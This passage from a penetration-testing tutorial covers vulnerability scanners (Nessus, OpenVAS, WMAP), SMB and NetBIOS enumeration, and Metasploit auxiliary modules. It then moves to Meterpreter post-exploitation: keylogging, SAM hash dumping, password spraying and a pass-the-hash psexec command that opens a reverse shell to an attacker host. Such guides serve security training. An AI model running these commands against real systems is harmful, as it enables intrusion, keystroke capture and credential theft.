On the attached picture we can also see a bunch of other options, like the number of hosts to test at the same time. This is useful when a range of hosts to scan is given. There is also the number of checks to perform at the same time, which means the number of plugins being applied to the victim at the same time. We can also choose how we'll do the port scan, via the nessus SYN/TCP/SNMP scanner, or via some other scanning techniques. To perform a simple, noisy scan on a non-production system, enabling all plugins is the best choice. If you know that you'll be targeting a Windows machine, then you can deselect most of the plugins.
3.3.2.2 Port Scanning

Port scanning identifies the active ports on the victim host. Since each port is tied to a specific application, nessus only runs the appropriate tests for that port/application. Since ports are often changed from their default port numbers to hide them, nessus has a plugin, services, which attempts to identify the program running on each port. Once the program is identified, only the appropriate plugins are run against it. Nessus has several port scanning techniques. There's a built-in wrapper for nmap, but there's also an internal scanner and a custom ping scan. Port scanning is very dependent on the situation. For a simple scan, the internal SYN scan using the default parameters with pings is sufficient.
3.3.2.3 Identify and Scan Targets

The final task is to identify targets. The target can be a single IP address or an IP range.

Then we just have to Execute the scan and wait for the results. After the scan is complete, we can see the output in the Results tab. There we can find the vulnerabilities found and their severity levels.

3.3.3 Importing Results Into the Metasploit


Let's import our results into metasploit. First, we must download the report and save the results to the hard drive. It will be saved with the .nbe extension. This can be imported into metasploit. Start msfconsole and import the results using the db_import command followed by the filename:

    msf > db_connect root:toor@127.0.0.1/msf3
    msf > db_import report.nbe

To verify that the scanned host and vulnerability data was imported properly, check with db_hosts. The following command will print the target IP address, the number of services detected and the number of vulnerabilities found by nessus:

    msf > hosts -c address,svcs,vulns
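What db_import reads from the .nbe file, as an added example that is not Metasploit's importer: a reader for the pipe-delimited NBE records that produces the address / svcs / vulns summary the hosts command prints. The report lines and plugin IDs below are constructed; the assumption that "Security Note" entries are informational and not counted as vulnerabilities is mine.

```ruby
# Added example: parse Nessus .nbe output into per-host service and
# vulnerability counts. NBE records are pipe-delimited:
#   results|<subnet>|<host>|<service>                       open port only
#   results|<subnet>|<host>|<service>|<plugin>|<severity>|<description>
# The sample below is constructed data with made-up plugin IDs.
SAMPLE_NBE = <<~NBE
  timestamps|||scan_start|Wed Oct 12 22:44:01 2011|
  timestamps||192.168.1.191|host_start|Wed Oct 12 22:44:02 2011|
  results|192.168.1|192.168.1.191|ssh (22/tcp)
  results|192.168.1|192.168.1.191|ssh (22/tcp)|90001|Security Note|SSH server type and version : SSH-2.0-OpenSSH_5.8p1
  results|192.168.1|192.168.1.191|http (80/tcp)
  results|192.168.1|192.168.1.191|http (80/tcp)|90002|Security Note|Port is open
  results|192.168.1|192.168.1.191|http (80/tcp)|90003|Security Warning|HTTP server type and version disclosed
  results|192.168.1|192.168.1.191|microsoft-ds (445/tcp)
  results|192.168.1|192.168.1.191|microsoft-ds (445/tcp)|90004|Security Hole|Placeholder: remotely exploitable SMB flaw
  timestamps||192.168.1.191|host_end|Wed Oct 12 23:08:10 2011|
  timestamps|||scan_end|Wed Oct 12 23:08:11 2011|
NBE

NbeFinding = Struct.new(:host, :service, :plugin_id, :severity, :description)

# Returns { ports: { host => [service, ...] }, findings: [NbeFinding, ...] }.
def parse_nbe(text)
  findings = []
  open_ports = Hash.new { |h, k| h[k] = [] }
  text.each_line do |line|
    fields = line.chomp.split('|', -1)   # keep empty trailing fields
    next unless fields[0] == 'results'
    host, service = fields[2], fields[3]
    open_ports[host] << service unless open_ports[host].include?(service)
    next if fields.size < 7              # bare open-port record, no finding
    findings << NbeFinding.new(host, service, fields[4], fields[5], fields[6..-1].join('|'))
  end
  { ports: open_ports, findings: findings }
end

# Severities that count as vulnerabilities (notes are informational).
VULN_SEVERITIES = ['Security Hole', 'Security Warning'].freeze

# One row per host, like "hosts -c address,svcs,vulns".
def host_summary(parsed)
  parsed[:ports].map do |host, services|
    vulns = parsed[:findings].count { |f| f.host == host && VULN_SEVERITIES.include?(f.severity) }
    { address: host, svcs: services.size, vulns: vulns }
  end
end

if __FILE__ == $PROGRAM_NAME
  host_summary(parse_nbe(SAMPLE_NBE)).each do |row|
    puts "#{row[:address]}  #{row[:svcs]}  #{row[:vulns]}"
  end
end
```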

3.3.4 Scanning With Nessus From Metasploit


If we want to use nessus directly from metasploit, we need to use the nessus plugin:

    msf > load nessus
    [*] Nessus Bridge for Metasploit 1.1
    [+] Type nessus_help for a command listing
    [*] Creating Exploit Search Index - (/root/.msf4/nessus_index) - this wont take long.
    [*]
    [*] It has taken : 6.697966 seconds to build the exploits search index
    [*] Successfully loaded plugin: nessus

nessus_help lists all the commands that the nessus plugin supports. Before starting a scan, we must first authenticate to the nessus server using nessus_connect:

    msf > nessus_connect root:toor@127.0.0.1:8834 ok
    [*] Connecting to https://127.0.0.1:8834/ as root
    [*] Authenticated

Then list the available policies:

    msf > nessus_policy_list
    [+] Nessus Policy List

    ID  Name                        Comments
    --  ----                        --------
    -4  External Network Scan
    -3  Internal Network Scan
    -2  Web App Tests
    -1  Prepare for PCI DSS audits

Choose the policy to use for the scan, then launch a new scan with nessus_scan_new followed by the policy ID, a name for the scan and the target IP:

    msf > nessus_scan_new -4 mynetwork 192.168.1.191

While the scan is in progress, we can check its status with nessus_scan_status:

    msf > nessus_scan_status
    [+] Running Scans

    Scan ID                                               Name       Owner    Started            Status
    -------                                               ----       -----    -------            ------
    c0fcef66-281b-4e84-532a-619510eb001ec2b9ad43c1350738  mynetwork  root     22:44 Oct 12 2011  running

After the scan has completed, we can list the available scan reports with nessus_report_list. To import a report into Metasploit, note its ID and run nessus_report_get followed by that ID:

    msf > nessus_report_list
    [+] Nessus Report List

    ID                                                    Name       Status     Date
    --                                                    ----       ------     ----
    c0fcef66-281b-4e84-532a-619510eb001ec2b9ad43c1350738  mynetwork  completed  23:08 Oct 12 2011

    [*] You can:
    [*]         Get a list of hosts from the report:          nessus_report_hosts <report id>

    msf > nessus_report_get c0fcef66-281b-4e84-532a-619510eb001ec2b9ad43c1350738
    [*] importing c0fcef66-281b-4e84-532a-619510eb001ec2b9ad43c1350738
    [*] 192.168.1.191   Done!
    [+] Done

3.4 OpenVas

3.4.1 Gentoo Linux


OpenVAS is a vulnerability assessment system much like Nessus. First we have to install it (the command below is the Debian/Ubuntu apt-get form; on Gentoo itself the package manager is emerge):

    # apt-get install openvas

Next, we have to add a user and create a certificate, much the same way as with Nessus:

    # openvas-adduser
    # openvas-mkcert

To update to the latest NVTs (the OpenVAS equivalent of Nessus plugins) from the OpenVAS feed, run:

    # openvas-nvt-sync

Start the OpenVAS daemon:

    # openvasd

We can see that the daemon is listening on port 9390:

    # netstat -landtp | grep openvas
    tcp        0      0 0.0.0.0:9390            0.0.0.0:*               LISTEN      12306/openvasd

Note that it is bound to 0.0.0.0, i.e. reachable on every interface; unless remote clients are needed, bind it to 127.0.0.1 or firewall the port, since the scanner holds the credentials used for authenticated scans.

Then start the OpenVAS client, which is essentially the same as the Nessus client except that it connects to a different port and uses the NVTs instead of plugins:

    # OpenVAS-Client

3.4.2 Backtrack Linux


First choose the following from the menu:

    OpenVas Adduser: add a new user
    OpenVas Mkcert: create a certificate
    OpenVas NVT Sync: sync the plugins
    OpenVas Check Setup: check if everything was set up correctly
    OpenVas Scanner: this will load all the plugins

Then, in a console:

    ; generate a client certificate
    # openvas-mkcert-client -n om -i

    ; rebuild the NVT database
    # openvasmd --rebuild

    ; set openvas administrator
    # openvasad -c 'add_user' -n admin -r Admin

    ; start openvas manager
    # openvasmd -a 127.0.0.1 -p 9390

    ; start openvas administrator
    # openvasad -a 127.0.0.1 -p 9393

    ; start greenbone security assistant
    # gsad --http-only --listen=127.0.0.1 -p 9392

Note that --http-only serves the web interface without TLS, which is acceptable only because it listens on 127.0.0.1.

Now open a web browser and type http://127.0.0.1:9392/. The login screen will look like the following picture.

Main Greenbone security assistant web page.

There's also another client, the Greenbone Security Desktop.

3.4.3 Administration
On the left side we have a bunch of links. If we click on the NVT Feed, we can update the NVT database.

3.4.4 Configuration
Let's start with scan configurations. OpenVAS comes with five template configurations, each of which does something specific.

We can create our own scan config if we want to customize it. We are presented with a bunch of options to adjust. This can be very helpful, so that we're not throwing a lot of futile Windows checks at a Linux server, and the other way around.

There is also a scheduling capability, where we can set it to scan our network once a week after business hours. With this, we can compare week-to-week results to detect any anomalies that may have appeared. The Escalator can trigger an event on completion of the scan; for instance, we can configure it to email the administrator when a scan has finished running.

In the Targets option, we configure the target to be scanned. Hosts can be a single IP address or a range of IP addresses, whereas Port Range can be a comma-separated list of port numbers or ranges. If the Port Range is not specified, all of the ports listed in /usr/local/share/openvas/openvas-services are used (around 8000 ports). If we wish to use credentials we can also choose them now. After this, we have to create a New Task. This is the point where we put it all together and start scanning.

Let's add a new task and hit the Play icon. Then we can look at Tasks to see the currently running tasks.

We can also click on the Details icon in the preceding picture, to get all the details of the scan: how complete is the scan, and which vulnerabilities have been found so far.

We can also export results from that view.

3.5 Specialty Vulnerability Scanners


If we would like to scan for a specific vulnerability across a network, we can use Metasploit's many auxiliary modules to accomplish this.

3.5.1 SMB Scanning


3.5.1.1 Understanding NetBIOS

SMB (or CIFS) is an application-layer network protocol that provides shared access to files, printers, serial ports and so on. SMB runs on top of the following transports:

    directly over TCP port 445
    via the NetBIOS API, which can run on several ports: UDP 137 and 138, and TCP 137 and 139

With NetBIOS, machines don't address each other by IP address but by name. Machines on the network are organised in WORKGROUPS, within which each machine is told apart by its name, so every machine in a workgroup must have a different name. There are two approaches to preventing duplicate names:

    Use a NetBIOS Name Server (NBNS) to keep track of which hosts have registered a NetBIOS name.
    Allow each machine on the network to defend its name in the event that another machine attempts to use it.

There must also be a way to resolve a NetBIOS name to a specific IP address. Again there are two approaches:

    Have each machine report back its IP address when it hears a broadcast request for its NetBIOS name.
    Use the NBNS to resolve NetBIOS names to IP addresses.

When a client machine boots, it broadcasts a message declaring that it wishes to register a specified NetBIOS name as its own. If nobody objects after multiple registration attempts, it keeps the name. If, on the other hand, another machine on the local subnet is currently using the requested name, it sends a message back to the requesting client saying that the name is already taken. This is known as defending the hostname. This type of system comes in handy when one client has unexpectedly dropped off the network, since another can take its name unchallenged, but it incurs an inordinate amount of traffic for something as simple as name registration. With an NBNS the same thing occurs, except that the communication is confined to the requesting machine and the NBNS server: no broadcasting occurs when the machine wishes to register the name; the registration message is sent directly from the client to the NBNS server, which replies whether or not the name is already taken. This is known as point-to-point communication, and is often beneficial on networks with more than one subnet, because routers do not forward broadcasts from one subnet to another.

3.5.1.2 Node Types

With NetBIOS there is just a single unique name to represent each computer, and each name is only allowed to have 15 characters. With NetBIOS, a machine not only advertises its presence, but also tells others what types of services it offers. The resource types are shown in angle brackets (<>) after the NetBIOS name, like:

    NAME<00>

NetBIOS unique resource types are the following:

    Named Resource                                                              Hex Byte Value
    Standard Workstation Service                                                00
    Messenger Service (WinPopup)                                                03
    RAS Server Service                                                          06
    Domain Master Browser Service (associated with primary domain controller)   1B
    Master Browser name                                                         1D
    NetDDE Service                                                              1F
    Fileserver (including printer server)                                       20
    RAS Client Service                                                          21
    Network Monitor Agent                                                       BE
    Network Monitor Utility                                                     BF

NetBIOS group resource types are the following:

    Named Resource                 Hex Byte Value
    Standard Workstation group     00
    __MSBROWSE__                   01
    Logon Server                   1C
    Master Browser name            1D
    Normal Group name              1E
    Internet Group name            20

__MSBROWSE__ is used to announce a group to other master browsers. To print all of the resources of a given host:

    # nbtscan -v 192.168.1.166
    NetBIOS Name Table for Host 192.168.1.166:

    Name             Service          Type
    ----------------------------------------
    MYNAME           <00>             UNIQUE
    WORKGROUP        <00>             GROUP
    MYNAME           <20>             UNIQUE
    WORKGROUP        <1e>             GROUP
    WORKGROUP        <1d>             UNIQUE
    __MSBROWSE__     <01>             GROUP

    Adapter address: 00-1e-8c-a9-5b-ab
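What nbtscan does under the hood is send a NetBIOS node-status (NBSTAT) query to UDP port 137 and decode the name table in the reply. As an added example (not code from the tutorial or from nbtscan), the Ruby below builds that query, parses a node-status response into the same table shown above, including the group/unique flag bits and the adapter address, and maps the suffix bytes with the tables from the previous section. The response in SAMPLE_RESPONSE is constructed in the script so it runs offline; the packet layout follows RFC 1002 and the request/response builders are this example's own helpers.

```ruby
# Added example (not from the tutorial): build the NetBIOS node-status (NBSTAT)
# request nbtscan sends and parse the response the way nbtscan prints it, using
# the suffix tables above. SAMPLE_RESPONSE is constructed for the example.

NBSTAT_TYPE = 0x0021   # RR type of a node-status query/response (RFC 1002)

UNIQUE_SUFFIX = {
  0x00 => 'Standard Workstation Service', 0x03 => 'Messenger Service (WinPopup)',
  0x06 => 'RAS Server Service',           0x1B => 'Domain Master Browser Service',
  0x1D => 'Master Browser name',          0x1F => 'NetDDE Service',
  0x20 => 'Fileserver (including printer server)', 0x21 => 'RAS Client Service',
  0xBE => 'Network Monitor Agent',        0xBF => 'Network Monitor Utility'
}.freeze

GROUP_SUFFIX = {
  0x00 => 'Standard Workstation group', 0x01 => '__MSBROWSE__',
  0x1C => 'Logon Server',               0x1D => 'Master Browser name',
  0x1E => 'Normal Group name',          0x20 => 'Internet Group name'
}.freeze

# First-level encoding (RFC 1001 14.1): each of the 16 name bytes becomes two
# letters, 'A' + high nibble and 'A' + low nibble. The wildcard '*' is NUL padded.
def encode_name(name, suffix = 0x00)
  raw = name == '*' ? '*' + "\x00" * 15 : name.ljust(15)[0, 15] + suffix.chr
  raw.bytes.map { |b| ((b >> 4) + 65).chr + ((b & 0xF) + 65).chr }.join
end

# UDP/137 request: header with one question, the encoded wildcard name,
# QTYPE NBSTAT, QCLASS IN.
def build_nbstat_request(txid = 0x1234)
  [txid, 0x0000, 1, 0, 0, 0].pack('n6') +
    "\x20".b + encode_name('*').b + "\x00".b +
    [NBSTAT_TYPE, 0x0001].pack('n2')
end

# Response: header (ANCOUNT 1), echoed name, RR type/class/TTL/RDLENGTH, then
# RDATA = name count, 18-byte entries (16-byte name + 2 flag bytes), statistics
# starting with the 6-byte adapter (MAC) address.
def parse_nbstat_response(pkt)
  _txid, flags, _qdcount, ancount = pkt.unpack('n4')
  raise 'not a name-service response' if (flags & 0x8000).zero? || ancount != 1
  rtype, _rclass, _ttl, _rdlen = pkt[46, 10].unpack('nnNn')
  raise 'not an NBSTAT record' unless rtype == NBSTAT_TYPE
  num_names = pkt.getbyte(56)
  names = Array.new(num_names) do |i|
    raw, nflags = pkt[57 + i * 18, 18].unpack('a16n')
    suffix = raw.getbyte(15)
    group  = (nflags & 0x8000) != 0        # G bit: group name
    { name: raw[0, 15].delete("\x00-\x1f").strip, suffix: suffix,
      type: group ? 'GROUP' : 'UNIQUE',
      active: (nflags & 0x0400) != 0,     # ACT bit
      service: (group ? GROUP_SUFFIX : UNIQUE_SUFFIX).fetch(suffix, 'unknown') }
  end
  mac = pkt[57 + num_names * 18, 6].unpack('C6').map { |b| format('%02x', b) }.join('-')
  { names: names, mac: mac }
end

# A <20> UNIQUE entry means the file server service is running, i.e. the host
# may be sharing resources (the check described in the text).
def shares_files?(result)
  result[:names].any? { |n| n[:type] == 'UNIQUE' && n[:suffix] == 0x20 }
end

# Build a response for the example so the parser can run offline (constructed).
def build_nbstat_response(txid, entries, mac)
  rdata = [entries.size].pack('C')
  entries.each do |name, suffix, group|
    nflags = (group ? 0x8000 : 0) | 0x0400
    rdata << [name.ljust(15)[0, 15], suffix, nflags].pack('a15Cn')
  end
  rdata << mac.pack('C6') << ("\x00".b * 40)   # rest of the statistics block
  [txid, 0x8400, 0, 1, 0, 0].pack('n6') +
    "\x20".b + encode_name('*').b + "\x00".b +
    [NBSTAT_TYPE, 0x0001, 0, rdata.bytesize].pack('nnNn') + rdata
end

SAMPLE_RESPONSE = build_nbstat_response(0x1234, [
  ['MYNAME',    0x00, false], ['WORKGROUP', 0x00, true],
  ['MYNAME',    0x20, false], ['WORKGROUP', 0x1E, true],
  ['WORKGROUP', 0x1D, false], ["\x01\x02__MSBROWSE__\x02", 0x01, true]
], [0x00, 0x1e, 0x8c, 0xa9, 0x5b, 0xab])

if __FILE__ == $0
  r = parse_nbstat_response(SAMPLE_RESPONSE)
  r[:names].each do |n|
    printf("%-16s <%02x>  %-6s  %s\n", n[:name], n[:suffix], n[:type], n[:service])
  end
  puts "Adapter address: #{r[:mac]}"
  puts 'File server service present: host may be sharing resources' if shares_files?(r)
end
```

To use it against a live host, send build_nbstat_request over a UDP socket to port 137 and feed the datagram you get back to parse_nbstat_response; the NBSTAT query is unauthenticated, which is why the name table (and the MAC address) leaks to anyone who can reach the port.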

If one of the entries in the above output carries the <20> suffix, the machine is running the file server service and is probably sharing resources. To see which resources it shares, issue:

    # smbclient -L 192.168.1.166
    Domain=[MYNAME] OS=[Windows 5.1] Server=[Windows 2000 LAN Manager]

            Sharename       Type      Comment
            ---------       ----      -------
            IPC$            IPC       Remote IPC
            D$              Disk      Default share
            ADMIN$          Disk      Remote Admin
            C$              Disk      Default share

    Domain=[MYNAME] OS=[Windows 5.1] Server=[Windows 2000 LAN Manager]

            Server               Comment
            ---------            -------

            Workgroup            Master
            ---------            -------

We can now use the following command to connect to the D$ share (drive D) on 192.168.1.166. Giving the password on the command line as shown lands it in the shell history; smbclient also prompts for it if it is omitted.

    # smbclient \\\\192.168.1.166\\D$ password
    Domain=[MYNAME] OS=[Windows 5.1] Server=[Windows 2000 LAN Manager]
    tree connect failed: NT_STATUS_ACCESS_DENIED

The password isn't correct. Note that the failure comes at tree connect, not at session setup: the server accepted the session (on XP with simple file sharing, a bad password is silently mapped to Guest) but the resulting account has no right to the D$ administrative share, which requires an administrator's credentials. Once we supply the right password, we can see the contents of drive D on 192.168.1.166.
3.5.1.3 Metasploit SMB Login Check

The SMB Login Check connects to a range of hosts and determines whether the username/password combination we possess can access them. This check is not stealthy: every attempt shows up as a logon event (failed or successful) in the event log of every Windows system it touches, and trying many passwords against one account will trigger any account-lockout policy in place, so spray one password across many hosts rather than many passwords at one host. Any successful result can be plugged into the windows/smb/psexec exploit module to create Meterpreter sessions.

    msf > use auxiliary/scanner/smb/smb_login
    msf auxiliary(smb_login) > set RHOSTS 192.168.50.0/24
    msf auxiliary(smb_login) > set SMBUser Administrator
    msf auxiliary(smb_login) > set SMBPass secret
    msf auxiliary(smb_login) > set THREADS 50
    msf auxiliary(smb_login) > run

3.5.2 VNC Authentication


VNC provides graphical access to a remote system. VNC servers are common in corporations because they provide a GUI-based view of server and workstation desktops. VNC is frequently installed to meet a temporary need and then completely forgotten and left unpatched. The VNC authentication scanner searches a range of IP addresses for targets running a VNC server without a password configured. To use it, select the auxiliary module, define the options and let it run:

    msf > use auxiliary/scanner/vnc/vnc_none_auth
    msf auxiliary(vnc_none_auth) > set RHOSTS 10.1.1.0/24
    msf auxiliary(vnc_none_auth) > set THREADS 50
    msf auxiliary(vnc_none_auth) > run
    [*] Auxiliary module execution completed

If Metasploit finds a VNC server with no authentication, we can use the vncviewer program to connect to the target machine without a password.

3.5.3 Open X11


The Open X11 scanner module scans a target range for X11 servers that allow a user to connect without any authentication (typically the result of xhost +).

    msf auxiliary(vnc_none_auth) > use auxiliary/scanner/x11/open_x11
    msf auxiliary(open_x11) > set RHOSTS 10.1.1.0/24
    msf auxiliary(open_x11) > set THREADS 50
    msf auxiliary(open_x11) > run
    [*] Auxiliary module execution completed

If we get lucky and find an open X11 server, we could start the xspy keylogger:

    # /pentest/sniffers/xspy -display 192.168.1.1:0 -delay 100

which remotely sniffs the keystrokes typed into that X server's session.

3.5.4 WMAP Web Scanner


First install the required packages:

    gem install robots
    gem install nokogiri
    sudo gem install anemone

WMAP is a web vulnerability scanner that was originally created from SQLMap and allows us to do web application scanning from within Metasploit. WMAP depends on an active database, which stores the list of target URLs and the results of the WMAP modules. To get started with WMAP, the database needs to be configured and at least one target must be added. Target data can be brought into WMAP through a spider, a proxy or an export from another tool; in the example we use the msf http crawler module to add a target. First we create a new database to store our scan results in, run the crawler, then load the wmap plugin and use its commands.

    msf > db_connect root:toor@localhost/wmap
    msf > use auxiliary/scanner/http/crawler
    msf auxiliary(crawler) > set RHOST 93.103.50.247
    msf auxiliary(crawler) > set RPORT 80
    msf auxiliary(crawler) > run

    [*] Crawling http://93.103.50.247:80/...
    [*] [00001/00500]    200 - 93.103.50.247 - http://93.103.50.247/
    [*] Crawl of http://93.103.50.247:80/ complete
    [*] Auxiliary module execution completed
    msf auxiliary(crawler) > load wmap
    [*] [WMAP 1.0] === et [ ] metasploit.com 2011
    [*] Successfully loaded plugin: wmap
    msf auxiliary(crawler) > wmap_sites -l
    Available sites
    ===============

         Id  Host           Vhost          Port  # Pages  # Forms
         --  ----           -----          ----  -------  -------
         0   93.103.50.247  93.103.50.247  80    1        0

    msf auxiliary(crawler) > wmap_targets -t 93.103.50.247:80
    msf auxiliary(crawler) > wmap_run -h
    [*] Usage: wmap_run [options]
            -h                      Display this help text
            -t                      Show all enabled modules
            -m [regex]              Launch only modules that name match provided regex.
            -e [/path/to/profile]   Launch profile modules against all matched targets.
                                    No file runs all enabled modules.

    msf auxiliary(crawler) > wmap_run -t
    [*] Testing target:
    [*]     Site: 93.103.50.247 (93.103.50.247)
    [*]     Port: 80 SSL: false
    ============================================================
    [*] Testing started. Wed Aug 31 23:52:55 +0200 2011

    =[ SSL testing ]=
    ============================================================
    [*] Target is not SSL. SSL modules disabled.

    =[ Web Server testing ]=
    ============================================================
    [*] Loaded auxiliary/scanner/http/robots_txt ...
    [*] Loaded auxiliary/scanner/http/http_version ...
    [*] Loaded auxiliary/admin/http/tomcat_utf8_traversal ...
    [*] Loaded auxiliary/scanner/http/svn_scanner ...
    [*] Loaded auxiliary/admin/http/contentkeeper_fileaccess ...
    [*] Loaded auxiliary/scanner/http/webdav_scanner ...
    [*] Loaded auxiliary/scanner/http/webdav_website_content ...
    [*] Loaded auxiliary/scanner/http/webdav_internal_ip ...
    [*] Loaded auxiliary/scanner/http/verb_auth_bypass ...
    [*] Loaded auxiliary/scanner/http/options ...
    [*] Loaded auxiliary/scanner/http/frontpage_login ...
    [*] Loaded auxiliary/scanner/http/web_vulndb ...
    [*] Loaded auxiliary/scanner/http/open_proxy ...
    [*] Loaded auxiliary/scanner/http/vhost_scanner ...
    [*] Loaded auxiliary/admin/http/tomcat_administration ...

    =[ File/Dir testing ]=
    ============================================================
    [*] Loaded auxiliary/scanner/http/dir_scanner ...
    [*] Loaded auxiliary/scanner/http/writable ...
    [*] Loaded auxiliary/scanner/http/prev_dir_same_name_file ...
    [*] Loaded auxiliary/scanner/http/ms09_020_webdav_unicode_bypass ...
    [*] Loaded auxiliary/scanner/http/trace_axd ...
    [*] Loaded auxiliary/scanner/http/backup_file ...
    [*] Loaded auxiliary/scanner/http/brute_dirs ...
    [*] Loaded auxiliary/scanner/http/replace_ext ...
    [*] Loaded auxiliary/scanner/http/dir_webdav_unicode_bypass ...
    [*] Loaded auxiliary/scanner/http/dir_listing ...
    [*] Loaded auxiliary/scanner/http/copy_of_file ...
    [*] Loaded auxiliary/scanner/http/file_same_name_dir ...
    [*] Loaded auxiliary/scanner/http/files_dir ...

    =[ Unique Query testing ]=
    ============================================================
    [*] Loaded auxiliary/scanner/http/blind_sql_query ...
    [*] Loaded auxiliary/scanner/http/error_sql_injection ...

    =[ Query testing ]=
    ============================================================

    =[ General testing ]=
    ============================================================
    [*] Analysis completed in 10.054025888443 seconds.
    [*] Done.
    ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
    msf auxiliary(crawler) > hosts -c address,svcs,vulns

    Hosts
    =====

    address        svcs  vulns
    -------        ----  -----
    93.103.50.247  1     0
    msf auxiliary(crawler) > db_notes

We can see that no vulnerabilities were recorded for the target. Note, though, that wmap_run -t only shows the enabled modules, as its usage text says; the tests themselves are launched with wmap_run -e, so a real assessment has to run that step before the hosts and db_notes output means anything.

3.5.5 Autopwning
Metasploit's autopwn module automatically targets and exploits a system based on its open ports or on the results of a vulnerability scanner. Autopwn can use the reports of the NeXpose, Nessus and OpenVAS scanners. The autopwn command can look like this:

    msf > db_autopwn -e -t -r -x -p

Explanation of the options:

    -e  launch exploits against all matched targets
    -t  show all matching exploit modules
    -r  use a reverse-connect shell payload
    -x  select exploit modules based on vulnerability references
    -p  also select exploit modules based on open ports

On success, we receive Meterpreter sessions, which we list with sessions -l and open with sessions -i <num>. Be aware that db_autopwn fires every matching exploit at every matching host, which is noisy and can crash services; it was also removed from the Metasploit Framework tree shortly after this was written, so current releases do not ship it.

4 Meterpreter
4.1 Introduction

Meterpreter is an advanced, dynamically extensible payload that uses in-memory DLL injection stagers and is extended over the network at runtime. It communicates over the stager socket and provides a comprehensive client-side Ruby API. It features command history, tab completion, channels and more. It accomplishes this by allowing developers to write their own extensions in the form of shared object (DLL) files that can be uploaded and injected into a running process on the target computer after exploitation has occurred. Meterpreter and all of the extensions it loads are executed entirely from memory and never touch the disk, which lets them run under the radar of standard antivirus detection.

We must point out once again that we get a Meterpreter shell only after we've successfully compromised the system. The Meterpreter shell is just a payload, like reverse_tcp, which lets us run Metasploit commands directly on the compromised operating system to obtain the information we want.

When exploiting a software vulnerability, the most common goal is to get access to /bin/sh or cmd.exe, which allows the attacker to execute commands on the remote machine with the privileges of the user running the vulnerable application. Access to the command interpreter gives the attacker nearly full control of the machine, bounded only by the privileges of the exploited process. The majority of published exploits include a payload that executes a command interpreter, with its input and output redirected to a TCP connection established by the attacker. There are a few disadvantages to using the native command interpreter:

    Executing the command interpreter creates a new process in the task list, making the attacker visible for the duration of the connection. Most host-based intrusion prevention systems (HIPS) will detect and prevent such actions on both Windows and UNIX.
    If the daemon runs in a chrooted environment, it is impossible to reference files and directories above the pseudo-root directory. Since the command interpreter typically lives outside the directory an application chroots to, executing it becomes impossible.
    The command interpreter is limited to the set of commands it has access to.

These three reasons illustrate the downsides of using a native command interpreter and are the motivation for Meterpreter, which avoids all three:

    Meterpreter avoids creating a new process because it executes in the context of the exploited process.
    Meterpreter extensions are executed entirely from memory, which sidesteps the chroot issue because nothing has to be started from the filesystem.
    Meterpreter allows incredible control and automation when it comes to writing extensions. Server extensions can be written in any language whose code can be distributed in shared object (DLL) form, so it is no longer necessary to hand-craft position-independent code in a low-level language such as assembly.

How Meterpreter works:

    The target executes the initial stager: bind, reverse, findtag, passivex, etc.
    The stager loads the DLL prefixed with Reflective, which handles the loading/injection of the DLL.
    The Meterpreter core initializes, establishes a TLS/1.0 link over the socket and sends a GET.
    Metasploit receives this GET and configures the client.
    Meterpreter loads extensions.

4.2 Meterpreter Commands


Meterpreter also provides a default set of commands:

    help         Displays the Meterpreter help menu.
    background   Sends the current Meterpreter session to the background and returns to the msf prompt. sessions -l and sessions -i <num> can then be used to return to the Meterpreter console.
    ps           Displays a list of running processes on the target.
    migrate      Migrates the session into another process on the victim; the post module does the same:
                     > run post/windows/manage/migrate
    ls           Lists all the files in the current remote directory.
    download     Downloads a file from the remote machine (use double backslashes when giving the Windows path).
    upload       Uploads a file to the remote machine.
    ipconfig     Displays the network interfaces and addresses on the remote machine.
    getuid       Displays the user that the Meterpreter server is running as on the host.
    execute      Runs a command on the target.
    shell        Presents a standard shell on the target system.
    idletime     Displays the number of seconds that the user at the remote machine has been idle.
    sysinfo      Tells us the platform on which the system is running.
    hashdump     Dumps the contents of the SAM database; the post module does the same:
                     > run post/windows/gather/hashdump
    screenshot   Exports an image of the active user's desktop and saves it to the /opt/metasploit3/msf3/ directory.

Meterpreter can be used with nearly all of the Windows exploits included in Metasploit by selecting one of the following payloads (these are the Metasploit 2 names; in Metasploit 3 and 4 the equivalents are windows/meterpreter/bind_tcp, windows/meterpreter/reverse_tcp and windows/meterpreter/find_tag):

    win32_bind_meterpreter
        Binds to a port on the target machine and waits for a connection. After the connection is established the Meterpreter server is uploaded and the existing connection is used as the Meterpreter communication channel.
    win32_reverse_meterpreter
        Connects back to the attacker on a given port. The connection is then used to upload the Meterpreter server, after which it is used as the Meterpreter communication channel.
    win32_findrecv_ord_meterpreter
        Searches for the file descriptor that the exploit was triggered from and uses it to upload the Meterpreter server, after which the same connection is used as the communication channel. This payload is particularly interesting because it does not require a new connection to be opened, so it passes firewall rules that would block a new inbound or outbound connection.

Depending on the exploit, any of these payloads can be used. The most suitable payload depends on both the exploit and the conditions under which it is run, such as firewall restrictions.

4.3 Doing interesting things with meterpreter


All sections here depend on the fact that the victim computer is already compromised and the meterpreter shell is available.

4.3.1 Capturing Keystrokes


With Meterpreter we can start keystroke logging on the remote system. First, let's list the running processes on the target with the ps command:

    meterpreter > ps

The ps command displays the PID, the name of the process, the user that started it and the path to its binary. We need to find explorer.exe and note its PID. Let's say the PID of explorer.exe is 666. We issue the migrate command to move our session into the explorer.exe process space (explorer.exe runs as the logged-on user, so that is where the user's keystrokes go):

    meterpreter > migrate 666

After that we just need to start the keylog_recorder module to capture the user's keystrokes:

    meterpreter > run post/windows/capture/keylog_recorder

The captured keystrokes are saved into a text file under the /root/.msf3/loot/ directory.

4.3.2 Dumping Usernames and Passwords


We can use Meterpreter to obtain the usernames and password hashes stored on the local system. First we load the priv extension, which provides the privileged commands:

    meterpreter > use priv

To dump the Security Account Manager (SAM) database, we need to be running as SYSTEM to get around the registry restrictions on the protected SAM storage that holds the usernames and password hashes. We run the hashdump post module, which dumps all the usernames and password hashes from the system:

    meterpreter > run post/windows/gather/hashdump

This gives us only the password hashes, not the passwords themselves, so we can't simply log in to additional machines with them. The pass-the-hash technique, however, needs only the hash: the windows/smb/psexec module accepts it in SMBPass, in the LMHASH:NTHASH form that hashdump prints (each line is user:rid:lmhash:nthash:::).

    msf > use windows/smb/psexec
    msf  exploit(psexec) > set PAYLOAD windows/meterpreter/reverse_tcp
    msf  exploit(psexec) > set LHOST 192.168.1.2
    msf  exploit(psexec) > set LPORT 443
    msf  exploit(psexec) > set RHOST 192.168.1.3
    msf  exploit(psexec) > set SMBPass <hash>
    msf  exploit(psexec) > exploit

